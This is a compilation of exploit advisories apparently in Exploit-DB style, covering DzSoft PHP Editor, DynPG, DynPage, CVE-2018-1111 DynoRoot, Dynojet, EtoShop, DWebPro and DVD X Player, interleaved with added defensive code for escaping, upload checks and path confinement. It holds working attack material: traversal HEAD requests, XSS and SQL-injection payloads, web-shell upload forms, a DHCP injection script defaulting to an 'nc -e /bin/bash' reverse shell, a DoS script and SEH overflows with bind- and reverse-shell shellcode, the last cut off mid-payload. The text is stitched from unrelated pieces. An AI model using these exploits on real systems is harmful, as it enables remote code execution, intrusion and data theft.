[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/DZSOFT-v4.2.7-PHP-EDITOR-FILE-ENUMERATION.txt
[+] ISR: ApparitionSec            
 


Vendor:
==============
www.dzsoft.com



Product:
=========================
DzSoft PHP Editor v4.2.7

DzSoft PHP Editor is a tool for writing and testing PHP and HTML pages.



Vulnerability Type:
====================
File Enumeration




CVE Reference:
==============
N/A

 

Security Issue:
================
DzSoft ships with a built-in web server used to preview PHP files. That server is prone to file-enumeration
attacks when HTTP "HEAD" requests are combined with a "\../../" style directory traversal. This lets an attacker
confirm which files exist on the host (and their sizes), information that can help in furthering other attacks.

On install DzSoft users get Windows network warning like:

"Allow Dzsoft to communicate on these networks:"

Private networks, such as my home or work network

Public networks, such as those in airports and coffee shops (not recommended).

This selection creates a firewall rule and determines which remote connections are allowed to reach DzSoft's built-in server.
A remote user who then makes an HTTP request to DzSoft gets HTTP 403 Forbidden from the built-in web server.

e.g.

curl  -v "http://VICTIM-IP/\../mysql/data/mysql.pid"


< HTTP/1.1 403 Forbidden
< Content-Type: text/html
< Content-Length: 1554
<
<HTML>
<HEAD>
  <TITLE>403 Forbidden</TITLE>
</HEAD>
<BODY>
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<!-- ---------------------------------------------------------------------------------------------------- -->
<H1>Forbidden</H1>
<p>For security reasons, you cannot access the built-in web server of DzSoft PHP Editor from another computer.</p>
<p>If you see this message within DzSoft PHP Editor's window, or if you think that there might be reasons to enable access from other computers,
</BODY>
</HTML>
* Connection #0 to host x.x.x.x left intact



However, this 403 Forbidden access control can be bypassed to "stat" files inside and outside the web root,
e.g. the mysql directory.

File enumeration conditions:

These settings are found under the Run / Run Options / Parameters tab.

a) The DzSoft built-in web server is running.
b) The built-in web server's "REMOTE_HOST=x.x.x.x" and "REMOTE_ADDR=x.x.x.x" are set to a real IP other than localhost.

For the PoC, create and save a PHP file under XAMPP/htdocs and run the DzSoft built-in web server in preview mode.

Next, make a request for "mysql/my-huge.ini" to see whether it exists.


C:\>curl  -v -I "http://VICTIM-IP/\../mysql/my-huge.ini"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../mysql/my-huge.ini HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 5057
Content-Length: 5057
< Cache-Control: no-cache
Cache-Control: no-cache


Checking for "mysql.pid"
/////////////////////////


C:\>curl  -v -I "http://VICTIM-IP/\../mysql/data/mysql.pid"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../mysql/data/mysql.pid HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 5
Content-Length: 5
< Cache-Control: no-cache
Cache-Control: no-cache
< Expires: 0


Checking for "xampp_shell.bat"
///////////////////////////////

C:\>curl  -v -I "http://VICTIM-IP/\../xampp_shell.bat"
*   Trying VICTIM-IP...
* Connected to VICTIM-IP (VICTIM-IP) port 80 (#0)
> HEAD /\../xampp_shell.bat HTTP/1.1
> User-Agent: curl/7.41.0
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Content-Type:
Content-Type:
< Content-Length: 1084
Content-Length: 1084
< Cache-Control: no-cache


These also work...


[root@localhost local]# wget -S --spider  "http://VICTIM-IP:8080/\../mysql/my-huge.ini"
--10:26:21--  http://VICTIM-IP:8080/%5C../mysql/my-huge.ini
Connecting to VICTIM-IP:8080... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Content-Type: 
  Content-Length: 5057
  Cache-Control: no-cache
  Expires: 0
Length: 5057 (4.9K) []
200 OK


[root@localhost local]# wget -S --spider  "http://VICTIM-IP:8080/\../mysql/my-innodb-heavy-4G.ini"
--10:29:03--  http://VICTIM-IP:8080/%5C../mysql/my-innodb-heavy-4G.ini
Connecting to VICTIM-IP:8080... connected.
HTTP request sent, awaiting response... 
  HTTP/1.0 200 OK
  Content-Type: 
  Content-Length: 20906
  Cache-Control: no-cache
  Expires: 0
Length: 20906 (20K) []
200 OK


Tested Windows XAMPP, Linux / curl
curl 7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5


//////////////////////////////////////////

Next, target files on C:\ Drive.

Bypass the 401 Forbidden response to enumerate a file named "hi.txt" on the C:\ drive:
wget "http://127.0.0.1:8088/c/hi.txt"  -c --header="Range: bytes=0"



Exploit/POC:
=============
In DzSoft PHP Editor:

1) Change the DzSoft web server options for the remote address to an IP other than localhost.
2) Create a test PHP file and deploy it under xampp/htdocs or whatever Apache install you are using.
3) Start DzSoft's built-in web server to preview the PHP file.

Then,


import socket

print 'DzSoft File Enumeration POC'
print 'Hyp3rlinx / ApparitionSec'

IP=raw_input("[IP]>")
PORT=int(raw_input("[PORT]>"))
DEPTH=int(raw_input("[DEPTH]>"))
FILE=raw_input("[FILE]>")
ENUM="HEAD "+"/\\"
ENUM+="../"*DEPTH+FILE+ " HTTP/1.0\r\n\r\n"

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(ENUM)
print 'Enumerating file:'
print ENUM
output = s.recv(128)
print output
s.close()




Network Access:
===============
Remote



Severity:
=========
Medium



Disclosure Timeline:
==================================
Vendor Notification: No reply
March 27, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
            
# Exploit Title: DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)
# Date: 2020-10-09
# Exploit Author: Enes Özeser
# Vendor Homepage: https://dynpg.org/
# Version: 4.9.1
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Log in to the admin panel.
2- Click on the "Texts" button.
3- Write the XSS payload into the Group name field.
4- Press the "Create" button.

XSS Payload ==> <script>alert("XSS");</script> 

==> HTTP Request <==

POST /index.php?show=4 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------342819783638885794661955465553
Content-Length: 725
Origin: http://(HOST)
Connection: close
Referer: http://(HOST)/index.php?show=4
Cookie: PHPSESSID=bsbas234jfvvdasdasd1i
Upgrade-Insecure-Requests: 1

-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="NEW_GROUP_NAME"

<script>alert("XSS");</script>
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GROUP_ID"

0
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GRP_SUBMIT"

Create
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="GRP_ACTION"

new_grp
-----------------------------342819783638885794661955465553
Content-Disposition: form-data; name="dpg_csrf_token"

3F16478C29BED20AA73F1D25CB23F471
-----------------------------342819783638885794661955465553--
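The request above stores the group name and the page later renders it back into HTML unescaped, which is the whole bug. The following is an added defensive example, not DynPG code: a vulnerable rendering function beside the hardened one, using the payload from the tutorial as constructed input. The template markup (`<tr><td data-name="...">`) is assumed for illustration.

```python
"""Output encoding for a stored group name: vulnerable and fixed renderers."""
import html

# Constructed sample input: the payload the tutorial above submits as NEW_GROUP_NAME.
XSS_PAYLOAD = '<script>alert("XSS");</script>'


def render_group_row_vulnerable(group_name: str) -> str:
    """Same bug class as the advisory: the stored value is concatenated into
    HTML as-is, so it lands in both an attribute and a text node unescaped."""
    return f'<tr><td data-name="{group_name}">{group_name}</td></tr>'


def render_group_row_fixed(group_name: str) -> str:
    """Escape once, at output time, for the HTML context the value is placed in.
    quote=True also encodes '"' so the attribute cannot be broken out of."""
    safe = html.escape(group_name, quote=True)
    return f'<tr><td data-name="{safe}">{safe}</td></tr>'


def template_tag_count(rendered: str) -> int:
    """Number of '<' in the output; for the fixed renderer only the four
    template tags (<tr>, <td>, </td>, </tr>) remain, whatever the input."""
    return rendered.count("<")
```

Escaping at output time is the robust fix because the same stored value may be rendered in several places; input filtering alone (or a CSRF token, which this request already carries) does not stop stored XSS once the value is in the database.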
            
source: https://www.securityfocus.com/bid/53696/info

DynPage is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

DynPage 1.0 is vulnerable; other versions may also be affected. 

########>>>>> Explo!T <<<<<<##################

# Download : [http://www.dynpage.net/download/dynpage.zip]

### [ Upload Sh3LL.php;.txt ] =>

<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Files" method="post" enctype="multipart/form-data" >
<input name="Files" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>



### [ Upload Sh3LL.php;.gif ;.jpeg ] =>

<!-- p0c 1 -->
<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Images" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

<!-- p0c 2 -->
<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Images" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>


### [ Upload Sh3LL.php;.swf ;.flv ] =>

<!-- p0c 1 -->
<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Flash" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

<!-- p0c 2 -->
<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Flash" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>
############# << ThE|End
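The forms above work because the connector trusts the client-supplied file name and extension (`Sh3LL.php;.txt`, `Sh3LL.php;.gif`, and so on). The following is an added defensive example, not CKFinder or DynPage code: server-side validation of an upload name against a per-type allow-list, refusing `;`, separators and any script extension anywhere in the name, followed by renaming to a random storage name. The allow-lists and the `Files`/`Images`/`Flash` type names are taken from the forms above; the accepted extensions are assumptions.

```python
"""Upload file-name validation and safe storage naming."""
from __future__ import annotations

import re
import secrets

# Assumed allow-lists per upload type (the connector distinguishes Files, Images, Flash).
ALLOWED_EXTENSIONS = {
    "files": {"txt", "pdf", "zip"},
    "images": {"gif", "jpg", "jpeg", "png"},
    "flash": {"swf", "flv"},
}
# Extensions a web server might hand to a script engine. They are refused
# anywhere before the final extension, so "Sh3LL.php.gif" fails too
# (a base name that is literally "php" is also refused; acceptable strictness).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar",
                     "asp", "aspx", "jsp", "cgi", "pl"}
# Dot-separated labels of safe characters only: no ';', spaces, or path separators.
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)+$")


def is_safe_upload_name(filename: str, resource_type: str) -> bool:
    """Validate a client-supplied file name against the type's allow-list."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any client path
    if not _NAME_RE.fullmatch(name):
        return False            # rejects 'Sh3LL.php;.txt', '..', hidden files, no extension
    labels = name.lower().split(".")
    if labels[-1] not in ALLOWED_EXTENSIONS.get(resource_type.lower(), set()):
        return False
    return not SCRIPT_EXTENSIONS.intersection(labels[:-1])


def storage_name(filename: str, resource_type: str) -> str | None:
    """Name to store the file under: a random token plus the validated
    extension, so nothing from the client reaches the filesystem."""
    if not is_safe_upload_name(filename, resource_type):
        return None
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"
```

The random storage name matters as much as the validation: even a name that passes the regex should not decide where or as what the file is written, and the upload directory itself should have script execution disabled.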
            
# Exploit Title: DynoRoot DHCP - Client Command Injection
# Date: 2018-05-18
# Exploit Author: Kevin Kirsche
# Exploit Repository: https://github.com/kkirsche/CVE-2018-1111
# Exploit Discoverer: Felix Wilhelm
# Vendor Homepage: https://www.redhat.com/
# Version: RHEL 6.x / 7.x and CentOS 6.x/7.x
# Tested on: CentOS Linux release 7.4.1708 (Core)  / NetworkManager 1.8.0-11.el7_4
# CVE : CVE-2018-1111

#!/usr/bin/env python

from argparse import ArgumentParser
from scapy.all import BOOTP_am, DHCP
from scapy.base_classes import Net


class DynoRoot(BOOTP_am):
    function_name = "dhcpd"

    def make_reply(self, req):
        resp = BOOTP_am.make_reply(self, req)
        if DHCP in req:
            dhcp_options = [(op[0], {1: 2, 3: 5}.get(op[1], op[1]))
                            for op in req[DHCP].options
                            if isinstance(op, tuple) and op[0] == "message-type"]
            dhcp_options += [("server_id", self.gw),
                             ("domain", self.domain),
                             ("router", self.gw),
                             ("name_server", self.gw),
                             ("broadcast_address", self.broadcast),
                             ("subnet_mask", self.netmask),
                             ("renewal_time", self.renewal_time),
                             ("lease_time", self.lease_time),
                             (252, "x'&{payload} #".format(payload=self.payload)),
                             "end"
                             ]
            resp /= DHCP(options=dhcp_options)
        return resp


if __name__ == '__main__':
    parser = ArgumentParser(description='CVE-2018-1111 DynoRoot exploit')

    parser.add_argument('-i', '--interface', default='eth0', type=str,
                        dest='interface',
                        help='The interface to listen for DHCP requests on (default: eth0)')
    parser.add_argument('-s', '--subnet', default='192.168.41.0/24', type=str,
                        dest='subnet', help='The network to assign via DHCP (default: 192.168.41.0/24)')
    parser.add_argument('-g', '--gateway', default='192.168.41.254', type=str,
                        dest='gateway', help='The network gateway to respond with (default: 192.168.41.254)')
    parser.add_argument('-d', '--domain', default='victim.net', type=str,
                        dest='domain', help='Domain to assign (default: victim.net)')
    parser.add_argument('-p', '--payload', default='nc -e /bin/bash 192.168.41.2 1337', type=str,
                        dest='payload', help='The payload / command to inject (default: nc -e /bin/bash 192.168.41.2 1337)')

    args = parser.parse_args()
    server = DynoRoot(iface=args.interface, domain=args.domain,
                      pool=Net(args.subnet),
                      network=args.subnet,
                      gw=args.gateway,
                      renewal_time=600, lease_time=3600)
    server.payload = args.payload

    server()
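The script above delivers its command inside DHCP option 252 (WPAD), relying on the client-side hook treating the option value as unquoted shell text. The following is an added defensive example, not part of the exploit repository or of NetworkManager: a check that flags string-valued lease options containing shell metacharacters, and the quoting a hook script should apply so an option value is always one literal word. The sample options are constructed, `PLACEHOLDER_COMMAND` stands in for any injected command, and the variable name `DHCP4_WPAD` is assumed for illustration.

```python
"""Detect shell metacharacters in DHCP option values and quote them safely."""
import shlex

# Characters that change how a POSIX shell parses an unquoted word.
SHELL_META = set("'\"`$&|;<>(){}#\n")

# Constructed sample lease options (not captured from a network): three
# ordinary values and one in the shape the script above sends.
SAMPLE_OPTIONS = [
    ("domain", "victim.net"),
    ("router", "192.168.41.254"),
    (252, "http://wpad.example.test/wpad.dat"),
    (252, "x'&PLACEHOLDER_COMMAND #"),
]


def suspicious_options(options):
    """Return [(code, value, offending_chars)] for every string-valued option
    carrying shell metacharacters; usable in a DHCP client hook or over
    decoded lease data from a capture."""
    findings = []
    for code, value in options:
        if not isinstance(value, str):
            continue
        bad = sorted(set(value) & SHELL_META)
        if bad:
            findings.append((code, value, bad))
    return findings


def export_assignment(name: str, value: str) -> str:
    """Shell line that hands an option to a hook script with the value quoted,
    so the shell sees exactly one word regardless of its contents."""
    return f"export {name}={shlex.quote(value)}"


def shell_words(line: str):
    """How a POSIX shell would tokenise the line (used to verify the quoting)."""
    return shlex.split(line)
```

Quoting at the point where the untrusted value is spliced into shell text is the root-cause fix; the metacharacter check is a useful detection layered on top, since a legitimate WPAD URL never needs quotes, ampersands or comment markers.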
            
# Exploit Title: Dynojet Power Core 2.3.0 - Unquoted Service Path
# Exploit Author: Pedro Sousa Rodrigues (https://www.0x90.zone/ / @Pedro_SEC_R)
# Version: 2.3.0 (Build 303)
# Date: 30.10.2021
# Vendor Homepage: https://www.dynojet.com/
# Software Link: https://docs.dynojet.com/Document/18762
# Tested on: Windows 10 Version 21H1 (OS Build 19043.1320)

SERVICE_NAME: DJ.UpdateService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DJ.UpdateService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
PS C:\Users\Developer> Get-UnquotedService


ServiceName    : DJ.UpdateService
Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart     : True
Name           : DJ.UpdateService

ServiceName    : DJ.UpdateService
Path           : C:\Program Files\Dynojet Power Core\DJ.UpdateService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'DJ.UpdateService' -Path <HijackPath>
CanRestart     : True
Name           : DJ.UpdateService

#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path (depending on the installation path). The service might be executed manually by any Authenticated user. If successful, the local user's code would execute with the elevated privileges of Local System.
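The PowerUp output above reports `C:\` as modifiable by Authenticated Users, and that is exactly the first location Windows consults for this service path. The following is an added example, not Dynojet's code or PowerUp's: given a BINARY_PATH_NAME, it lists the files the service control manager may try (each space-delimited prefix with `.exe` appended, per the CreateProcess lookup rules) and the directories whose ACLs must therefore be audited. Quoted paths yield a single candidate.

```python
"""Candidate binaries and audit locations for an unquoted service path."""
from __future__ import annotations

import ntpath


def is_quoted(binary_path: str) -> bool:
    """True when the image path is wrapped in double quotes (arguments may follow)."""
    return binary_path.strip().startswith('"')


def candidate_binaries(binary_path: str) -> list[str]:
    """Files Windows may try, in order, when a service with this
    BINARY_PATH_NAME starts: for an unquoted path with spaces, each prefix
    ending just before a space (with '.exe' added if it has no extension),
    then the intended binary itself."""
    path = binary_path.strip()
    if is_quoted(path):
        return [path[1:].split('"', 1)[0]]
    candidates = []
    idx = path.find(" ")
    while idx != -1:
        prefix = path[:idx]
        if not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
        idx = path.find(" ", idx + 1)
    candidates.append(path)
    return candidates


def directories_to_audit(binary_path: str) -> list[str]:
    """Directories where a stray candidate could be created; none of them may
    grant write or append rights to ordinary users."""
    stray = candidate_binaries(binary_path)[:-1]
    return sorted({ntpath.dirname(c) for c in stray})


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """The condition that makes a service path exploitable at all."""
    return len(candidate_binaries(binary_path)) > 1
```

Fixing the service means quoting `BINARY_PATH_NAME` (for example with `sc config`), after which `candidate_binaries` returns only the real executable; until then, the directories the function reports are the ones to watch for unexpected `.exe` files.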
            
source: https://www.securityfocus.com/bid/64371/info

EtoShop Dynamic Biz Website Builder (QuickWeb) is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.

EtoShop Dynamic Biz Website Builder (QuickWeb) 1.0.0 is vulnerable; other versions may also be affected.

www.example.com/dweb/login.asp

UserID : x' or ' 1=1--
Password : x' or ' 1=1-- 
            
http://www.example.com/dweb/apps/news-events/newdetail.asp?id=1=[SQL INJECTION] 
            
# Exploit Title: DWebPro 8.4.2 Remote Binary Execution
# Date: 01/10/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Author twitter: @tulpa_security
# Vendor Homepage: http://www.dwebpro.com/
# Software Link: http://www.dwebpro.com/download
# Version: 8.4.2
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec

1. Description:

DWebPro is a software package used for distributing dynamic web sites on CD/DVD or USB drives. It includes its
own web server, called the "primary web server", as well as an SMTP server. The PoC below relates to the
installation of DWebPro itself; however, it is conceivable that the vulnerability could be leveraged within certain
contexts from a CD/DVD or USB drive. Depending on the client configuration, this vulnerability could be exploited
remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DoS attacks.

2. Remote Binary Execution and Local File Inclusion Proof of Concept

When browsing the demo site installed with DWebPro you will find hyperlinks to various resources located on the
local machine. One such example is
"http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english\dwebpro.chm". Any file on the
vulnerable machine can be accessed by simply replacing the start?file= location. It is important to note, however,
that when browsing to an executable file through this vulnerability, the web server will run the application
locally instead of prompting you for a download. As an example, the following will start the calculator process on
the victim machine: "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe".
Calc.exe will by default execute with the same permissions as the user who ran dwebpro.exe initially.

Basic cmd commands can also be executed, such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig".

These privileges can be escalated to SYSTEM, however, by installing the application as a Windows service, which will
automatically run on start-up. In order to initiate that installation, the attacker could take advantage of a script
which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using
"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat".
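Both the DzSoft file-enumeration advisory earlier on this page (`/\../mysql/my-huge.ini`, with `%5C` as the encoded backslash) and the DWebPro `start?file=` issue above come down to a server taking a client-supplied path without confining it to the webroot. The following is an added defensive example, not code from either product: a resolver that URL-decodes the request (repeatedly, to defeat double encoding), treats both slash kinds as separators, refuses NUL bytes and drive letters, and rejects any `..` that would climb above the root. The root directory `/var/www` in the test is an assumption; the request paths are the ones shown in the advisories.

```python
"""Confine a client-supplied request path to a fixed webroot."""
from __future__ import annotations

from urllib.parse import unquote


def _decode_fully(raw: str, rounds: int = 3) -> str:
    """URL-decode until the value stops changing (defeats e.g. %255C -> %5C -> '\\')."""
    current = raw
    for _ in range(rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def _is_drive(segment: str) -> bool:
    """A Windows drive designator such as 'C:' means an absolute path was supplied."""
    return len(segment) == 2 and segment[1] == ":" and segment[0].isalpha()


def resolve_under_root(root: str, raw_request_path: str) -> str | None:
    """Map a request path onto a file below *root*, or return None if it escapes.

    The result is a '/'-joined path for the server to serve as bytes; it must
    never be handed to a process launcher, which is the second DWebPro defect.
    """
    if "\x00" in raw_request_path:
        return None
    decoded = _decode_fully(raw_request_path).replace("\\", "/")
    if "\x00" in decoded:            # a NUL hidden behind %00
        return None
    stack: list[str] = []
    for segment in decoded.split("/"):
        if segment in ("", "."):
            continue                 # empty segments also absorb '//' and a leading '/'
        if _is_drive(segment):
            return None
        if segment == "..":
            if not stack:
                return None          # would climb above the webroot
            stack.pop()
            continue
        stack.append(segment)
    return root.rstrip("/") + "/" + "/".join(stack)
```

Note that the resolver also rejects DWebPro's own demo link, which is an absolute `C:\...` path: a server that wants to link to help files should reference them relative to its root rather than accept filesystem paths from the client.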

3. Denial of Service Proof of Concept

#!/usr/bin/python

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.1',25))

evil = 'A' * 300
s.recv(1024)
s.send(evil)

s.close()
            
######################################################
# Exploit Title: Buffer Overflow on DVD X Player Standard 5.5.3.9
# Date: 29.03.2018
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Category: Local (SEH Based)
# Exploit Credit: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 5.5.3.9
# Tested on: Windows XP SP3 x86
# CVE: CVE-2018-9128
######################################################

# root@PKP:~# msfvenom -p windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 -b "\x00\x0a\x0d\x1a" -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of python file: 1710 bytes


file = open("exploit_dvdx_player_standard_5.5.3.9.plf","w")
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"
seh = "\xBC\x13\x5F\x02" # pop/pop/ret : EchoDelayProcess.dll
nops = "\x90" * 100

buf = ""
buf += "\xda\xd4\xd9\x74\x24\xf4\xb8\xb3\xb9\xc8\xae\x5a\x31"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x13\x03\xf1\xaa\x2a"
buf += "\x5b\x09\x24\x28\xa4\xf1\xb5\x4d\x2c\x14\x84\x4d\x4a"
buf += "\x5d\xb7\x7d\x18\x33\x34\xf5\x4c\xa7\xcf\x7b\x59\xc8"
buf += "\x78\x31\xbf\xe7\x79\x6a\x83\x66\xfa\x71\xd0\x48\xc3"
buf += "\xb9\x25\x89\x04\xa7\xc4\xdb\xdd\xa3\x7b\xcb\x6a\xf9"
buf += "\x47\x60\x20\xef\xcf\x95\xf1\x0e\xe1\x08\x89\x48\x21"
buf += "\xab\x5e\xe1\x68\xb3\x83\xcc\x23\x48\x77\xba\xb5\x98"
buf += "\x49\x43\x19\xe5\x65\xb6\x63\x22\x41\x29\x16\x5a\xb1"
buf += "\xd4\x21\x99\xcb\x02\xa7\x39\x6b\xc0\x1f\xe5\x8d\x05"
buf += "\xf9\x6e\x81\xe2\x8d\x28\x86\xf5\x42\x43\xb2\x7e\x65"
buf += "\x83\x32\xc4\x42\x07\x1e\x9e\xeb\x1e\xfa\x71\x13\x40"
buf += "\xa5\x2e\xb1\x0b\x48\x3a\xc8\x56\x05\x8f\xe1\x68\xd5"
buf += "\x87\x72\x1b\xe7\x08\x29\xb3\x4b\xc0\xf7\x44\xab\xfb"
buf += "\x40\xda\x52\x04\xb1\xf3\x90\x50\xe1\x6b\x30\xd9\x6a"
buf += "\x6b\xbd\x0c\x06\x63\x18\xff\x35\x8e\xda\xaf\xf9\x20"
buf += "\xb3\xa5\xf5\x1f\xa3\xc5\xdf\x08\x4c\x38\xe0\x32\x5f"
buf += "\xb5\x06\x50\x4f\x90\x91\xcc\xad\xc7\x29\x6b\xcd\x2d"
buf += "\x02\x1b\x86\x27\x95\x24\x17\x62\xb1\xb2\x9c\x61\x05"
buf += "\xa3\xa2\xaf\x2d\xb4\x35\x25\xbc\xf7\xa4\x3a\x95\x6f"
buf += "\x44\xa8\x72\x6f\x03\xd1\x2c\x38\x44\x27\x25\xac\x78"
buf += "\x1e\x9f\xd2\x80\xc6\xd8\x56\x5f\x3b\xe6\x57\x12\x07"
buf += "\xcc\x47\xea\x88\x48\x33\xa2\xde\x06\xed\x04\x89\xe8"
buf += "\x47\xdf\x66\xa3\x0f\xa6\x44\x74\x49\xa7\x80\x02\xb5"
buf += "\x16\x7d\x53\xca\x97\xe9\x53\xb3\xc5\x89\x9c\x6e\x4e"
buf += "\xb7\x6d\xa2\x5b\x20\xd4\x57\x26\x2c\xe7\x82\x65\x49"
buf += "\x64\x26\x16\xae\x74\x43\x13\xea\x32\xb8\x69\x63\xd7"
buf += "\xbe\xde\x84\xf2"

file.write(buffer + next_seh + seh + nops + buf)
file.close()
            
#!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 
#   In Windows 7, the SEH handler address to be used contains a \x00 byte,
#   which is a restricted character. For that reason, every jump has to go
#   backward, to the beginning of the attacking shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode

shellcode = ""
shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
